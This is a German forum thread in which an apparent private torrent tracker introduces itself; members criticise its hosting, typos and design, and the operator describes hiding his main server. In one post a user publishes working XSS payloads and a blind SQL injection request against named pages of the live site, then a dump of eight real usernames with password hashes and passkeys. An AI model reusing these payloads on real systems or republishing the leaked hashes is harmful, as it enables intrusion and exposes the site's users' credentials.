Black Universe Anti Leech stellt sich vor

**Nimbus** · 24.05.2017, 11:30

Wollte mich gestern mal registrieren (dauert ja eigentlich nicht lange) um mal einen Blick drauf zu werfen. Leider wurde mir mit dem aktuellen FF (unter Linux) kein Button angezeigt um die Registrierung abzuschicken.

Unnötige Schreib/Tippfehler, wie "cloudfaire" und "clout", machen mich ziemlich nervös. Andere Leute empfinden das, gerade in einer Vorstellung, vermutlich noch deutlich negativer.

Bezüglich des Hosting: Nicht flunkern. Ihr nutzt definitiv (in welcher Weise genau kann man nur raten) auch einen Hosteurope Server. Ich würde dir definitiv davon abraten das weiter zu dementieren, denn sonst postet hier ganz schnell einer eure IP als Beweis (gefunden haben sie sicher schon einige). Auch die Domain dort zu haben ist relativ undurchdacht.

Insgesamt bin ich von diesem Projekt und der Vorstellung nicht überzeugt...

erwieder · 24.05.2017, 11:51

naja jedem das seine. Betreffend das Hosting ist es (so sage ich es mal) im grunde egal wo mann es macht (ausser strato). Verboten ist es bei Jedem hoster.

der unterschied ist gegenüber den anderen/meisten alt's das ich wirklich nur die source hoste und keine Files. Welches nicht verboten ist.

und das ich von hosteurope (ist ein anderer anbieter aber die server sind welche von denen) die Domain als weiterleitung zu dem Server nehme ist auch an und für sich nicht schlimm. (Schlimm währe es wenn ich auf dem host europe die source und files bzw. rtorrent ect. laufen lassen würde) aber für die paar files die ich seede bzw. der shoutcast und ts server befinden sich auf einem ovh root.

Das wenn man die url genau zurück verfolgt man einen anbieter bzw die ip von host herausbekommt ist nicht schwer. (egal wie man es verstecken möchte)

Bezüglich kein Button, kann ich nicht genau bestättigen ob es ein genereller fehler ist oder nur bei dir wegen dem Linux. (Die Seite ist für firefox @ windows programiert) andere browser gehen auch (betriebssysteme hab ich nicht getestet) unterstützen aber auch nicht alle funktionen

betr. der clout..... ich kenne keinen Großen oder szene alt der keine clout nutzt

**Nimbus** · 24.05.2017, 12:40

Bezüglich des Wahrheitsgehaltes bzw. der Richtigkeit deiner Aussagen halte ich mich mal bedeckt. Eines kann ich dir allerdings versichern: Eine schlechte Wahl des Hostings oder der Domain hat durchaus das Potential einem Projekt das Genick zu brechen

erwieder · 24.05.2017, 13:19

ist schon richtig, aber für den anfang reicht es.
Wenn die seite mal gewisse aktivität hat, hole ich einen anderen url server und nimm die url mit. Nur sind mir da momentan umgerechnet ~20€/monat zuviel. (ca. 1,50 die domain und 18-20 der root)
Jetzt könnte man sagen warum nimmst du die url nicht einfach auf den ukraine root mit ? ganz einfach damit der haupt root wo die source läuft soweit unbekannt bleibt.

alternative könnte ich auch mit dyndns eine url erstellen und sie auf dem haupt root weiter leiten, dann währe aber die url bxp. black-universe.xyz.xy und das möchte ich nicht

**FLX** · 29.05.2017, 17:45

Thema kann gelöscht werden.
Grund : project wird überarbeitet. Bei start gibt es ein neues Thema

so läuft das aber nicht, erst ankündigen, werben und dann direkt alles entfernen.
Der Beitrag wurde wiederhergestellt und du kannst das ganze dann auch hier weiterführen.

**SecurityFlaw** · 29.05.2017, 19:47

phpinfo()

Warum lässt jeder diesen Kram online?
Geht doch niemanden was an, was dort drin steht...

Unter diesen Umständen werde ich mich schonmal nicht registrieren...

**doge** · 29.05.2017, 20:44

Zitat von brimb0rium

Warum müssen deutsche Tracker eigentlich immer scheiße ausschauen?

Amen, Bruder.

Ich würde dem Themenstarter auch empfehlen etwas mehr in's Design zu investieren. Es macht mehr aus als man denkt.

**SecurityFlaw** · 29.05.2017, 22:02

An der Sicherheit sollte auch noch gearbeitet werden:

Code:

http://www.black-universe.li/recover.php | POST: email=TEST"><script>alert(String.fromCharCode(88,83,83));</script>

Code:

https://www.black-universe.li/coverurl.php?form="><script>alert(String.fromCharCode(88,83,83));</script>

Ebenfalls gibt es die möglichkeit SQL-Befehle zu injecten!
Ist die SQL-Abfrage valid so erscheint diese Meldung:

Code:

http://www.black-universe.li/forumstake.php?action=rate | POST: topicid=4&forumid=6&postid=(SELECT(CASE WHEN(ORD(MID((SELECT IFNULL(CAST(passhash AS CHAR ),0x20) FROM neu.users ORDER BY id LIMIT 0,1),32,1))NOT BETWEEN 0 AND 51)THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS)END))&userid=31&returnto=forums.php?action=viewtopic&topicid=4&page=p4#p4&rating=3

Das ganze kann man dann noch automatisiert dumpen (Vorzugsweise mit sqlmap):

Code:

Database: neu
Table: users
[8 entries]
+----+-----------------+----------------------------------+-------------------------+
| id | username        | passhash                         | passkey                 |
+----+-----------------+----------------------------------+-------------------------+
| 1  | D@rk-Ripper\x99 | ca59f625d7c9fbd505f3f069e922f054 | Û\x95ÉIzwxú             |
| 24 | Loyd            | 7e1734c6a4dcf3534f115b98a89f655d | íÛÃ\x8dâ3\r\x89         |
| 25 | Warlock         | 2858ec3ddc45c1c3cdb35c06c3c8a32f | #MöÛ3\x1fW¹             |
| 26 | sumfl0w         | 462ccbef5dc0734dada6806e739730cb | à¸\x92\x83\x15\x1dý\x95 |
| 27 | BabyRay         | 3d66eaf3ec5b8bb9f3dd145c1acc6793 | i:½qI\x8dgý             |
| 28 | ThaPUSHer       | 93b91d70047a5e48fc15427b41f83aae | ÕÛ\x16ß_Ä.m             |
| 29 | hddude          | ae35c2f5600ea1643d6ae20c4533c0df | ÁÁmô\x7fvM\x05          |
| 31 | user123         | 36f561c263e02d142667f451871a34aa | ¡k/2{<P©                |
+----+-----------------+----------------------------------+-------------------------+

**syrius** · 29.05.2017, 22:23

Zitat von SecurityFlaw

An der Sicherheit sollte auch noch gearbeitet werden (Ist nicht der einzige Fund!):

Du olles Scriptkiddie xD *joke*, ne machste gut!

**SecurityFlaw** · 29.05.2017, 22:43

Warst zu schnell, schau es dir jetzt nochmal an!

P.S.: Für heute genug Mist im Netz verzapft, ich geh dann mal schlafen

**syrius** · 29.05.2017, 22:48

Zitat von SecurityFlaw

Warst zu schnell, schau es dir jetzt nochmal an!

P.S.: Für heute genug Mist im Netz verzapft, ich geh dann mal schlafen

8 User xD da geht ja die Post ab ^^

**SecurityFlaw** · 29.05.2017, 22:49

Wobei user123 mein testacc war...

**FLX** · 26.01.2020, 00:10

Dieses Thema wurde von einem Moderator aufgrund folgender Kriterien geschlossen.

[X] Service ist Offline
[X] Keine Rückmeldung des Erstellers
[X] Aktiver Support ist nicht gewährleistet
[ ] Sonstige Gründe

Sofern nachvollziehbare Gründe vorliegen kann dieses Thema wieder geöffnet werden.
Wende dich dazu bitte an einen Moderator.

Mfg Szenebox.org Team

Thema: Black Universe Anti Leech stellt sich vor

Themen-Optionen

Anzeige

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Berechtigungen

SzeneBox.org... im Mittelpunkt der Szene!